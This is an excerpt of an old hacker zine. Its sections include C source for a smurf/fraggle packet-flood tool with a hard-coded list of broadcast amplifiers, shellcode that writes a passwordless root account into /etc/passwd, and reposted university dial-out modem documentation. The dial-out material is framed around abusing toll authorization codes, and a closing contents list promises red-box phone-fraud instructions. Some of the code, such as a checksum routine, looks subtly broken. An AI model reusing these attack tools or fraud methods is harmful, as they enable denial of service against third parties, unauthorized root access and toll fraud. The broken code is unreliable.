ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0,
(struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet); /* free willy! */
}
void ctrlc (int ignored)
{
fprintf(stderr, "\n%sD%so%sn%se%s!%s\n\n", dgrey, red, dgrey, red, dgrey, norm);
exit(1);
}
unsigned short in_chksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p)
{
struct iphdr *ip; [ can't write own fraggle function? ]
struct udphdr *udp; [ du0d the author iz going to piss himself ]
char *packet; [ because we sure are! ]
int r;
packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip = (struct iphdr *)packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
/* ip header */
ip->protocol = IPPROTO_UDP;
ip->saddr = sin->sin_addr.s_addr;
ip->daddr = dest;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip->ihl = 5;
ip->frag_off = 0;
ip->check = checksum((u_short *)ip, sizeof(struct iphdr));
/* udp header */
udp->len = htons(sizeof(struct udphdr) + p->ps);
udp->dest = htons(p->dst);
if (!p->src)
udp->source = htons(rand());
else
udp->source = htons(p->src);
/* send it on its way */
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
0, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
if (r == -1)
{
fprintf(stderr, "\n%sSending packet%s", red, norm);
exit(-1);
}
free(packet); /* free willy 2! */
}
unsigned short checksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft--;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}
int main (int argc, char *argv[])
{
int i, n, s, uf = 0, delay, num, bcast2 = 1, cycle = 10, cmdcount = 1, jhtype = 0;
struct sockaddr_in sin;
struct hostent *he;
struct pktinfo p;
char buf[32], **bcastfile = malloc(1024), attack[3], usefile[5], singlebcast[32];
FILE *bfile;
#ifdef PRIVATE
/* Replies as of 6/5/98 - 246 90 107 134 */
char *bcast[] = {
"207.229.16.0", "155.58.120.0", "206.39.75.255", "206.39.81.255",
NULL
};
#else
char *bcast[] = { NULL };
#endif
banner();
signal(SIGINT, ctrlc);
if (argv[1] == NULL) bad_type();
else if ((*argv[1] == 'i') || (*argv[1] == 'u')) {
jhtype++;
if (*argv[1] == 'u') jhtype++;
} else bad_type();
if (argc < 3) usage(argv[0]);
sprintf(usefile, argv[++cmdcount]);
if(usefile[0] == 'b') {
if(usefile[1] == '\0') uf = 1;
if((usefile[1] == 'c') && (usefile[2] == '\0')) uf = 2;
}
if(uf == 0) {
if(bcast[0] == NULL) { fprintf(stderr,
"%sI'm Sorry This Version is not a PRiVaTe version.\n"
"%sIt does not include an internal address list.\n"
"%sPlease use either the %sb %sor %sbc %soptions.\n"
" %s-%sMorpheus%s\n\n",
red, white, red, dgrey, red, dgrey, red, white, cyan, norm);
exit(-1);
}
}
if(uf == 1) {
if((argc - ++cmdcount) < 5) usage(argv[0]);
if ((bfile = fopen(argv[cmdcount++], "r")) == NULL)
{
fprintf(stderr, "%sopening broadcast file %s\n\n", red, norm);
exit(-1);
}
n = 0;
while (fgets(buf, sizeof buf, bfile) != NULL)
{
buf[strlen(buf) - 1] = 0;
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0]))
continue;
bcastfile[n] = malloc(strlen(buf) + 1);
strcpy(bcastfile[n], buf);
n++;
}
bcastfile[n] = '\0';
fclose(bfile);
if (!n)
{
fprintf(stderr, "%sError: No valid addresses in file!%s\n\n", red, norm);
exit(-1);
}
}
if(uf == 2) {
if((argc - ++cmdcount) < 5) usage(argv[0]);
if(isdigit(*argv[cmdcount])) strcpy(singlebcast, argv[cmdcount++]);
}
if ((argc - cmdcount) < 4) usage(argv[0]);
if ((he = gethostbyname(argv[cmdcount])) == NULL)
{
fprintf(stderr, "%sCan't resolve hostname!%s\n\n", red, norm);
exit(-1);
}
memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv[++cmdcount]);
delay = atoi(argv[++cmdcount]);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
{
fprintf(stderr, "%screating raw socket%s", red, norm);
exit(-1);
}
p.ps = atoi(argv[++cmdcount]);
cmdcount++;
p.src = 0;
p.dst = 53;
if (jhtype == 1) {
setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&bcast2, sizeof(bcast2));
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
} else if (jhtype == 2) {
if (argc >= cmdcount +1) p.src = atoi(argv[cmdcount++]);
if (argc >= cmdcount +1) p.dst = atoi(argv[cmdcount++]);
}
#ifdef DEBUG
printf("Debug Infomation\n----------------\n");
printf("Type = %d\nBcast = %d\n", jhtype, uf);
printf("Target = %s\n", *he);
printf("Num of Pkts = %d\n", num);
printf("Delay = %d\nPacket Size = %d\n", delay, p.ps);
printf("Src Port = %d\nDest Port = %d\n", p.src, p.dst);
printf("Argc # = %d\nCmdcount # = %d\n", argc, cmdcount);
exit(0);
#endif
srand(time(NULL) * rand() * getpid());
if(jhtype == 1)
printf("%si%sCMP ", red, dgrey);
else if(jhtype == 2)
printf(" %su%sdP ", red, dgrey);
printf("%sJ%sa%sckH%sa%smm%se%sr%si%sng %s[%s", dgrey, red, dgrey,
red, dgrey, red, dgrey, red, dgrey, cyan, red);
printf("%s", *he);
printf("%s] (%s. %s= %s1000 %soutgoing packets%s)\n%s", cyan, red, white, red, dgrey, cyan, blue);
for (i = 0, cycle = 0; i < num || !num; i++) {
if (!(i % 1000)) { printf("."); fflush(stdout); }
if(jhtype == 1) {
if(uf == 0) smurf(s, sin, inet_addr(bcast[cycle]), p.ps);
else if(uf == 1) smurf(s, sin, inet_addr(bcastfile[cycle]), p.ps);
else smurf(s, sin, inet_addr(singlebcast), p.ps);
} else if(jhtype == 2) {
if(uf == 0) fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
else if(uf == 1) fraggle(s, &sin, inet_addr(bcastfile[cycle]), &p);
else fraggle(s, &sin, inet_addr(singlebcast), &p);
}
if(uf == 1)
if (bcastfile[++cycle] == NULL) cycle = 0;
if(uf == 0)
if (bcast[++cycle] == NULL) cycle = 0;
usleep(delay);
}
ctrlc(0);
}
[ end of fear (EOF) ]
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 17 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
#include
#include
#include
codez()
{
__asm__("
xorl %eax, %eax
xorl %ebx, %ebx
xorl %ecx, %ecx
xorl %edx, %edx
movb $5, %al # SYS_open
movl $passwd, %ebx # ebx ptr to passwd
incb %cl # 1 = O_WRONLY
int $0x80
movl %eax, %ebx # fd
xorl %eax, %eax
movb $19, %al # SYS_lseek
decb %cl # offset = 0
movb $2, %dl # SEEK_END
int $0x80
xor %eax, %eax
movb $4, %al # SYS_write
movl $entry, %ecx # ecx ptr to entry
movb $30, %dl # count = 30
int $0x80
xor %eax, %eax
movb $1, %al
int $0x80 # gotta fix later
entry:
.ascii \"b4b0::0:0:Fatima:/usr:/bin/sh\\n\"
passwd:
.string \"/etc/passwd\"
");
}
char large_string[128];
void main()
{
char *shellcode= (char *)codez;
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
rUn aZ rooT!
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 18 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
Hi. Everyone really loves dialouts. How do a lot of people find them? scanning,
mostly. But its funny. You type in "Dialout" on a search engine and the possi-
bilities are almost endless. Check it. This is that PSU dialout everyone and
their biological mothers know about.
this peice of information contains a lot of helpful stuff, take notes!
THE PENNSYLVANIA STATE UNIVERSITY
OFFICE OF TELECOMMUNICATIONS
OPERATING INSTRUCTIONS
for
DIALOUT.PSU.EDU
Version 1.1
July 6, 1993
U.Ed. OTC 96-3
HTML conversion: August 29, 1995
_________________________________________________________________
Acknowledgments:
* Compiled and written by: John Balogh
* Content corrections by: Steve Schroeder, Mark Paige
* Editorial comments and corrections by: Margaret Gearhart, Peter
Weiss
_________________________________________________________________
Table of Contents
1. Introduction
1. Purpose of this Document
2. Intended Use
3. Billing
2. Capabilities
1. Terminal Emulation
3. Use
1. Connecting with TELNET
2. "AT" Dialing
3. Trouble
4. Advanced Features
1. Long Distance Billing ("Toll")
2. Required Forms
3. Security Considerations
5. Availability
1. Initial Capacity
2. Future Service Expansion
3. Documentation On-line
* References
* Glossary
* Appendices
1. "AT" Command Set
2. Example DIALOUT Sessions
o "Local" (Tymnet)
o "800"
o "Toll Call"
3. Frequently Called Numbers
4. Authorization Code Implementation
o Purpose
o Terminology
o Procedure
o Discontinuing Use of Long Distance Authorization Codes
5. Long Distance Auth Code Data Collection Form
_________________________________________________________________
Introduction
DIALOUT.PSU.EDU is a service available on Penn State's Data
Backbone [3] that allows a backbone user to originate a connection
to modem-accessible computers which are not otherwise available on
the backbone. The service allows modem calls that are local to the
University Park area and calls that attach to toll-free "800"
numbers. To place modem calls that will incur a long-distance
(toll) charge, authorizing forms (described in section 4 of this
document) must be completed first, or a credit-card dialing method
must be used.
Purpose of this Document
The purpose of this document is to describe the use of
DIALOUT.PSU.EDU (DIALOUT) on the Penn State Data Backbone to
access services that are presently available only to modem
users. It will discuss the capabilities, use of DIALOUT,
access to advanced features and availability.
Intended Use
As is stated in other Office of Telecommunications (OTC)
write-ups (V.32 User Guide [1], Serial Line Internet Protocol
Overview [2]), many users of data processing equipment have
experienced a need for "phone line" connections to other
computing equipment. A typical case is a user who needs to
connect to services on the Penn State Data Backbone, but is
not physically located at one of the campuses. The logical
solution is an autodial modem. A modem is used to call from
the user's site to the nearest convenient modem that is
connected to the public access network for the Penn State
Data Backbone and establish a terminal session.
However, if the user is already connected to the backbone and
wishes to communicate with a service such as a Bulletin Board
System (BBS) that is not accessible via the backbone, then
considerations of modems, phone lines and phone line charges
again come to mind.
The solution is now available without the need for additional
hardware or monthly charges in the DIALOUT service.
This service is intended for the user on the data backbone
who needs occasional accessto a local bulletin board or one
of the timesharing services such as Compuserve or Telenet. It
is also available for the user who needs to dial out to a
host which is not within the University Park local calling
area if the call can be billed to their Penn State budget and
fund number.
Billing
If a backbone user wishes to connect with a dial-in service
that would incur a toll call charge, they must complete some
forms and obtain signatures to authorize that use of the
service. This process will be described in section 4.2 later
in this document. DIALOUT is not a free way to make long
distance modem connections.
Capabilities
The DIALOUT modem ports are set to 38,400 bps and the modems are
capable of V.32bis, V.32, V.42bis, V.42, MNP5 and all subset
standards of these protocols (examples include Bell 103 and
V.22bis). If the service that is dialed runs at a lower speed, the
communications path will take care of the mismatch in speed.
Terminal Emulation
The link from the Penn State Data Backbone to the DIALOUT
modem ports utilizes a terminal server. The supported
terminal emulation is VT100. This emulation may imply some
restrictions on the types of services to which a successful
connection can be established. In general, if the service can
be utilized from a VT100 terminal, it can also be utilized
from the backbone, through the DIALOUT service.
Use
The service can be accessed with a TELNET command to connect to
the DIALOUT.PSU.EDU service. Once accessed, the modem is able to
understand commands given to it in the "AT" command set, and a
call can be placed.
Connecting with TELNET
Access to the TELNET function varies from computer to
computer. In general, the method would be to start a TELNET
session as you would with any other host, but specify DIALOUT
for the host name. If you have trouble connecting with just
the name, try adding the domain; for example,
DIALOUT.PSU.EDU. Further details on access are in the section
"Availability," later in this document.
"AT" Dialing
The DIALOUT service modem pool understands the Hayes "AT"
dialing command set. A list of available AT commands is
listed in Appendix 1 at the end of this document.
Once connected to DIALOUT, type the three characters:
"a", "t" and "return".
It does not matter if they are typed in upper or lower case.
The modem should reply with the message "OK" thus:
at <--- typed by the user on the DTE's keyboard
OK <--- typed by the modem
Note that all messages that have the comment "typed
by the user" are followed by the "RETURN" or
"ENTER" key on the keyboard. Those messages that
have the comment "typed by the modem" are sent from
the modem to the user's screen; the user does NOT
type them. This applies to all the examples that
follow in this document.
Full examples are included at the end of this document in
Appendix 1.
Trouble
If the connection to DIALOUT is not completed, all the lines
may be in use or something may be broken; try again after a
few minutes to see if the service was busy. If the connection
never completes, call (814) 863-HELP (863-4357) and press 2
for Data Service problems. Report any problem accessing the
DIALOUT service. Someone will check it out and get back to
you.
Please do not send EMAIL to OTC to report a trouble. A timely
response to the trouble reported in this manner cannot be
guaranteed.
Advanced Features
The DIALOUT service can be used to place modem calls to numbers
that have a toll charge associated with them. The procedure for
accomplishing this is detailed in the following paragraphs and in
Appendix 4.
Long Distance Billing ("Toll")
Modem calls to services that are not local (to State College)
or "800" calls can be billed to a phone number (account) at
Penn State. An Access Code and an Authorization Code are
needed to place these types of calls. The Access Code is 175
for any DIALOUT session (or phone line on campus). The
Authorization Code must be requested on a special form (see
section 4.2). A unique private password (Authorization Code)
is then assigned and sent to the requester.
Required Forms
The form for requesting a "Long Distance Authorization Code"
can be found in Appendix 5. It must be submitted to the OTC
Business Office for processing.
Security Considerations
The Authorization Code is the "key" that unlocks access to a
billing account associated with a telephone at Penn State. It
should be treated the same as physical access to that phone.
That is, the Authorization Code should be given ONLY to the
person or people who are permitted to charge phone calls to
that budget and fund number.
Availability
This service is available for use only from computers that have
access to the Penn State Data Backbone. These computers include,
but are not limited to, computers on a network which has a router
on the backbone and computers or terminals which connect through
any of the dialup or direct serial ports which are connected to
the backbone.
If a requirement for access from other sites is defined, a letter
explaining the intended use, expected load in number of calls per
day and expected duration of each call should be written to:
Penn State University
The Office of Telecommunications
Data Services Group
101 Telecommunications Building
University Park, PA 16802-5800
Initial Capacity
OTC has initially sized this DIALOUT service with a small
number of available lines (modems) and will monitor the use
of those to determine the requirement for adding additional
lines.
Future Service Expansion
As modems standards advance and hardware/software becomes
available, OTC will upgrade the DIALOUT service to take
advantage of these standards.
Documentation On-line
This document is available on-line via anonymous FTP at the
site FTP.OTC.PSU.EDU in the files
ftp://ftp.otc.psu.edu/pub/otcdoc/dialout.txt (ASCII text) and
ftp://ftp.otc.psu.edu/pub/otcdoc/dialout.ps (postscript). The
most current version of the document will always reside
there.
_________________________________________________________________
References
"V.32 User Guide"
Penn State University
The Office of Telecommunications
Data Services Group
101 Telecommunications Building
University Park, PA 16802-5800
+1 814 863 1354
(Also available from ftp://ftp.otc.psu.edu/pub/otcdoc/v32_user.txt
(ASCII text))
"Serial Line Internet Protocol Overview"
Penn State University
The Office of Telecommunications
Data Services Group
101 Telecommunications Building
University Park, PA 16802-5800
+1 814 863 1354
(Also available from ftp://ftp.otc.psu.edu/pub/otcdoc/slip.txt
(ASCII text) and ftp://ftp.otc.psu.edu/pub/otcdoc/slip.ps
(postscript))
"A Guide to the Penn State Data Backbone"
Penn State University
The Office of Telecommunications
Data Services Group
101 Telecommunications Building
University Park, PA 16802-5800
+1 814 863 1354
(Also available from ftp://ftp.otc.psu.edu/pub/otcdoc/backbone.txt
(ASCII text)) and ftp://ftp.otc.psu.edu/pub/otcdoc/backbone.ps
(postscript))
_________________________________________________________________
Glossary
ANSI
American National Standards Institute
Also a terminal emulation type. Similar to DEC's VT100 terminal
type.
AutoDial
1. noun: a modem that can be commanded to perform dialing
sequences to originate a phone call.
2. verb: process of placing a phone call without manually
dialing the numbers, etc.
Baud
Units of information per second.
Examples:
+ Bell 103 (300 Baud) modems convey 300 bps of information.
+ Bell 212 (600 Baud) modems convey 1200 bps of information,
where each baud contains two bits of data.
+ V.22bis (600 Baud) modems convey 2400 bps of information,
where each baud contains four bits of data.
Bell 103
Standard for 300 bps modems.
Bell 212
Standard for 1200 bps modems.
bps
Bits Per Second (sometimes confused with BAUD)
Number of logical "1" and "0" pieces of information per unit of
time (second).
DCE
Data Communications Equipment.
Example: Modem.
DIALIN
1. noun: remote (to PSU) service accessible with a modem.
2. verb: the process of connecting to such a modem service.
DIALOUT
1. noun: PSU service that enables data backbone users to
originate modem connections to nonPSU services.
2. verb: the process of using a modem to connect from a host,
to another that has a modem DIALIN.
DTE
Data Terminal Equipment.
Examples: Terminal, PC, MAC.
MNP
Microcom Networking Protocol.
A class (series of levels) of software enhancements used over a
communications path (modem).
Example: MNP Level 4 is similar in function to V.42. MNP Level
5 enables compression up to 2:1 ratio on some data.
RxD
Received Data.
The data which is received by the DCE and sent to the DTE.
SLIP
Serial Line Internet Protocol.
A method of connecting two devices that understand Internet
Protocol over a serial line or modem.
TELENET
A service provider company which can be accessed with a modem
or DIALOUT.
TELNET
A protocol for remote terminal connection on the data backbone.
TxD
Transmitted Data.
The data which is sent from the DTE to the DCE for transmission
over the communications link.
V.22bis
Standard 2400 bps modem protocol.
V.32
Standard 9600 bps modem protocol.
V.32bis
Standard 14,400 bps modem protocol.
V.42
Standard data integrity and link layer interface. Used with
modems to ease application software definition.
V.42bis
Standard compression algorithm. Allows 4:1 compression on some
data. Does not try to compress binary data.
VT100
Digital Equipment Corporation (DEC) terminal type. Similar to
ANSI terminal type.
This terminal is emulated by many TELNET packages on devices
which attach to the data backbone.
_________________________________________________________________
Appendices
"AT" Command Set
Command
Description
AT
ATtention - prefix to all commands
D
Dial - command causes modem to go "off hook" and
interpret following commands for dialing
T
Tone - DTMF "TouchTone" option to "D" command
W
Wait - causes a pause until next dialtone is detected
,
(comma) - causes a one-second pause in a dialing sequence
(ignores all signals on phone line)
0,1,...,9
digits - used for telephone numbers and other numbers in
dialing sequences
_____________________________________________________________
Example DIALOUT Sessions
________________________________________________________
"Local" (Tymnet)
telnet dialout
Connected to dialout.psu.edu.
OTC's Network Terminal Service
This service is only for use authorized by Penn State
at
OK
atdt82343853
DIALING
CONNECT 2400
BUFFER 38400
Please log in: PSU_test
error, type user name:
(An authorized Tymnet user could now login...)
________________________________________________________
"800"
telnet dialout
Connected to dialout.psu.edu.
OTC's Network Terminal Service
This service is only for use authorized by Penn State
at
OK
atdt818002341998
DIALING
CONNECT 9600
BUFFER 38400
UNAUTHORIZED ACCESS IS PROHIBITED.
All use of this system is governed exclusively by the Terms
and Conditions of a Digital Business Agreement if one is
currently in effect between your company and Digital, or the
Standard Terms and Conditions of Sale (including Software
License) with Digital Equipment Corporation. The Terms and
Conditions of Sale are available on the E-Connection Services
Menu for review.
Port name: _LTA4974:
Welcome to Digital's Electronic Store.
Please wait a moment for start up ...
Terminal type: VT220
Digital's Electronic Connection
For assistance call: 1-800-DIGITAL
Welcome to the Electronic Connection
HOURS: 7 a.m. - 12 Midnight Eastern Time
[...]
________________________________________________________
"Toll Call"
Here is an example of a call to a long distance modem which
was busy at the time of the attempt.
telnet dialout
Connected to dialout.psu.edu.
OTC's Network Terminal Service
This service is only for use authorized by Penn State
at
OK
atdt175w1234567w814089884004
DIALING
BUSY
at
OK
Note the Access Code (175) and the Authorization Code
(1234567). This Authorization Code is obviously invalid, and
would be replaced by a valid one for an actual DIALOUT
session.
_____________________________________________________________
Frequently Called Numbers
DIALOUT
Service Speed Location Phone Number
---------------- ----- ---------------- ------------
TBAWL (Public) 2400 State College PA 82385559
TBAWL (Members) 2400 State College PA 82376778
TBAWL = (The Blue & White Lion Bulletin Board)
CompuServe 2400 State College PA 82387910
Telenet 2400 State College PA 82311510
Tymnet 2400 State College PA 82343853
Tymnet 9600 Norristown PA 812156290567
Tymnet 9600 Pittsburgh PA 814126422271
Digital Equip. 9600 7AM-Midnight EST 818002341998
McAfee BBS 2400 Santa Clara CA 814089884004
WordPerfect BBS 1200 Orem, UT 818012254414
_____________________________________________________________
Authorization Code Implementation
________________________________________________________
Purpose
Authorization Codes (Auth Codes) allow a level of security on
a modem (or phone) line so that unauthorized long distance
calling is prevented. A modem line can be restricted to local
or on-campus calling only. However, by dialing the
Authorization Code Access Number (175) followed by the
seven-digit Auth Code the line's class of service is
(temporarily) changed to a level where a long distance call
can be completed and be charged against the Auth Code. Only
by using an Auth Code can long distance calls be completed
from the restricted station.
Two types of Auth Codes are be implemented on our phone
switch. They are Non-Station Specific Auth Codes and Station
Specific Authorization Codes. Non-Station Specific Auth Codes
can be used from any University modem (or phone) line to
change its restricted status and allow a toll call to be made
and charged against the Auth Code. Station Specific Auth
Codes must be used at the telephone station to which the Auth
Code has been assigned.
The Office of Telecommunications is supporting both
Non-Station Specific Auth Codes and Station Specific Auth
Codes. However, it is preferable to use Station Specific Auth
Codes because they provide the higher level of security.
There will be times when Non-Station Specific Auth Codes are
required and these applications will be supported. For most
applications, we recommend Station Specific Auth Codes be
used.
Note that the DIALOUT service REQUIRES a Non-Station Specific
Auth Code.
________________________________________________________
Terminology
Auth Code
Authorization Code - A code which allows a caller
to override the calling restrictions placed against
a phone line.
SS
Station Specific Auth Codes must be used at the
telephone station to which the Auth Code has been
assigned.
SW
Non-Station Specific Auth Codes can be used from
any University telephone.
TSR
Telecommunications Service Request. This is the
form on which all requests for services from the
Office of Telecommunications should be submitted.
________________________________________________________
Procedure
All requests for Auth Codes require that a TSR and a Long
Distance Authorization Code Data Collection Form be
completed. The TSR can be completed by either the
Communications Analyst (CA) or the department requesting the
Auth Code. The Long Distance Authorization Code Data
Collection form must be filled in by the CA.
Both forms must include the date that the Auth Codes are to
be activated and whether Non-Station Specific Authorization
Codes or Station Specific Authorization Codes are being
requested.
Attached to the TSR should be a Long Distance Authorization
Code Data Collection Form which should be filled out with the
information shown in Appendix 5.
________________________________________________________
Discontinuing Use of Long Distance Authorization Codes
If a department decides to discontinue the use of
Authorization Codes, the department will need to complete a
TSR listing the telephone numbers and existing authorization
codes that are to be discontinued. A most important component
of this TSR will be the date. The date on the TSR should be
considered the date for the Business Office to remove the
restrictions on the lines and the date the listed Auth Codes
are to be removed from the switch.
(adapted from original OTC procedure)
_____________________________________________________________
Long Distance Auth Code Data Collection Form
The form is to be completed by the appropriate Communications
Analyst (CA) (call 865-1940 and ask to speak to your "CA").
The form requires the following information:
1. Name of the person being assigned the code.
2. The type of code being used.
SS designates Station Specific Authorization Codes.
SW designates a Non-Station Specific Auth Code.
3. The telephone number of the person to whom the code is being
assigned. If the person being assigned the Auth Code has a
Meridian Business Set it will be necessary to note that and
indicate which line the Station Specific Auth Code is to be
assigned against.
4. The budget number that the assigned Auth Code will be charged
against. In some cases authorization codes may be charged
against different budgets and it is necessary that the
appropriate budget be listed for each code.
5. The line indicated under telephone number in most cases will
be restricted as part of the order. Typically a DIALOUT user
will not want their desk phone to be restricted from making
long distance calls. Make sure that the CA does NOT enter
this field unless it is desirable to restrict the phone so
that long distance calls must always use the Access and Auth
codes.
6. The office location of the person being assigned the Auth
Code. Upon receipt of the TSR and the attached Data
Collection Form, the Business Office will log in the TSR and
assign Auth Codes to each individual listed on the form.Auth
codes cannot be listed on the TSR itself (it goes back to the
department and may be seen by anyone.)
(adapted from original OTC procedure)
_________________________________________________________________
Last updated 1/6/98
Send comments and suggestions to webmaster@otc.psu.edu.
.. Now if they were smart this site would only be accessable to the university
and not to the entire net. But no. Here is the last and final peice.
Dialout Modems
WVNET provides a pool of dial-out modems for network users who need
telephone access to other computer resources, such as Telenet, TYMNET,
Compuserve, or bulletin board systems (BBSs).
* Before You Start
* Access Instructions
* Exiting Dialout
* Where to Connect
+ Telenet
+ TYMNET
+ Compuserve
* If You Have a Problem
Before You Start
Following are some important points to keep in mind:
* Protocols for the outbound modems are preset and cannot be changed
by users. For Parity Challenged users, WVNET provides two
different outbound modem service connections:
+ DIALOUT: for 8 bits/No Parity modem connections.
+ DIALOUTE: for 7 bits/Even Parity modem connections.
* The modems operate at 300/1200/2400 autobaud; however, your
terminal server connection into them may be set at any speed.
* Modems are Hayes compatible, using the conventional "AT" command
syntax.
* Unless you have an authorized TID number, these modems will not
work for long-distance service. They are intended for local use
(Morgantown area) and toll-free calls only.
* The outbound modem connects to WVNET's Centrex 293 exchange.
+ To dial within this exchange, prefix your four-digit number
with a "3".
+ To dial outside of this exchange, or to make a toll-free
call, you must first dial the digit "9".
+ To make a long-distance TID call, you must first dial the
digit "8", the actual telephone number, followed by several
pauses (commas) and your TID number.
* Xmodem and Ymodem protocols do not currently work when passing
through the WVNET terminal server. This obviously precludes the
use of these two file transfer protocols through the dialout
modems.
Access Instructions
Access instructions are provided for the DIALOUT service; they are
identical to the DIALOUTE service. The example provided below shows a
user attempting to connect to a 2400 bps service outside of WVNET's
293 exchange. See Outbound Modem Result Codes for other possible modem
result codes.
_________________________________________________________________
Outbound Modem Result Codes
Result Code Word Result Code Description
OK Acknowledges execution of a command line
BUSY Modem detected a busy signal
CONNECT A connection has been established at 300 bps
CONNECT 1200 A connection has been established at 1200 bps
CONNECT 2400 A connection has been established at 2400 bps
ERROR User command was not recognized or is too long
NO CARRIER Failure to connect or loss of carrier
_________________________________________________________________
1. At the terminal server prompt, enter the command:
C DIALOUT
If successful, you should see a message like the following:
Local -010- Session 1 to DIALOUT on node WVN059 established
2. At this point, you should be connected to the modem. To verify
this, you can enter the modem attention command:
AT
The modem should respond with the result code:
OK
3. You may now dial a number using the ATDT command. For example, to
dial Morgantown's local 2400-baud Telenet pad, you would enter
(remember to add the "9,"):
ATDT 9,292-0492
4. The modem should respond with the number you are dialing. In this
example, it should look like this:
DIALING T 9,292-0492
5. If the telephone connection is successfully made, you should see
the result code:
CONNECT 2400
6. At this point, some remote services may require you to press
RETURN or enter some other wake-up command.
Exiting Dialout
If you successfully connect to an outside computer resource via the
outbound modem, you should be automatically dropped back to the
terminal server when you quit from the resource.
If you are still at the outbound modem, issue the modem command:
ATF
to exit from the modem and return to the terminal server prompt.
Where to Connect
Aside from BBS access, the dialout modem user can access several local
Morgantown pads, such as for Telenet, TYMNET or Compuserve.
Telenet
The telephone number for Morgantown's local 2400-baud Telenet pad is
292-0492 (see the Access Instructions above). Upon a successful
connection, you need to provide a wakeup command, which depends upon
whether you are using DIALOUT (N81) or DIALOUTE (E71).
* DIALOUT: D <cr>
* DIALOUTE: @ <cr> <cr>
If you are successfully connected, Telenet will prompt you for a
terminal type:
TERMINAL=
Respond with D1 if you are using a CRT or a PC.
Telenet product and service information is available by calling
800-736-1130 (voice only).
TYMNET
The telephone number for Morgantown's local 2400-baud TYMNET pad is
292-3092 (see the Access Instructions above). TYMNET is supposed to
support both N81 and E71 protocols.
When you get the CONNECT 2400 message, you must quickly provide a
terminal identifier before the system drops you.
If you are connecting via DIALOUT, type the letter o (do not hit a
carriage return ) until you see a login prompt.
If you are connecting via DIALOUTE, type the letter a (do not hit a
carriage return ) until you see a login prompt.
Help is available by typing HELP at the logon prompt. TYMNET general
information is available by calling 800-937-2862 (voice only).
Compuserve
The Morgantown area has direct Compuserve telephone access number to
support a range of baud rates. Because the dialout modems are limited
to 2400 baud, it would not be practical (or economical!) to list
numbers for higher baud rates. The telephone number for Morgantown's
local 2400-baud Compuserve pad is 291-5884 (see the Access
Instructions above). Note that Compuserve prefers E71 protocol.
Compuserve customer service is available by calling 800-848-8990
(voice only).
If You Have a Problem
The dialout modems present an interesting problem to the user. Using
them is somewhat akin to navigating with only instruments to guide
you. Your vision is limited to what little you can see on your screen,
and you cannot hear what the dialout modem is doing.
Are you using the appropriate numeric prefix when you dial? See Before
You Start for the correct prefix.
One known problem with the dialout modems is with the use of the
carriage return/line feed combination <CR/LF>. To our knowledge this
only affects you if you are using a TELNET protocol to connect to the
dialout modem. Your software should be configured to send only a
carriage return <CR>. If your software is sending a <CR/LF>, you will
see the modem responding with
DIALING
, followed by
OK
, when you attempt to dial a number with the ATDT command:
ATDT 35001
DIALING
OK
If your software is working properly, you should see something like
this:
ATDT 35001
DIALING T 35001
CONNECT 2400
-- E0F --
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 19 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
DeathCraz's Stupid Shit
@
\|/ _
/'\ /"\@ <-- "RaM iT iN mE JOeY!@$#"
mE & gRaNdPa!$#$!@#
ThE rAdCrAz eZiNe %Issue 1% by DeathCraz
/////////\\\\\\\\\\
-------------------
cOnTeNTZ!@#$
************
1#......% -> InTrOduCtiOn <-
2#......% -> hOw teW clEan aN aNuS <-
3#......% -> rIpPeD aNuS cODe!@#$ <-
4#......% -> hOw tO bUiLd a rEd bOx <-
5#......% -> uSiNG a rEd bOX <-
6#......% -> hAx0Rz i pHEaR
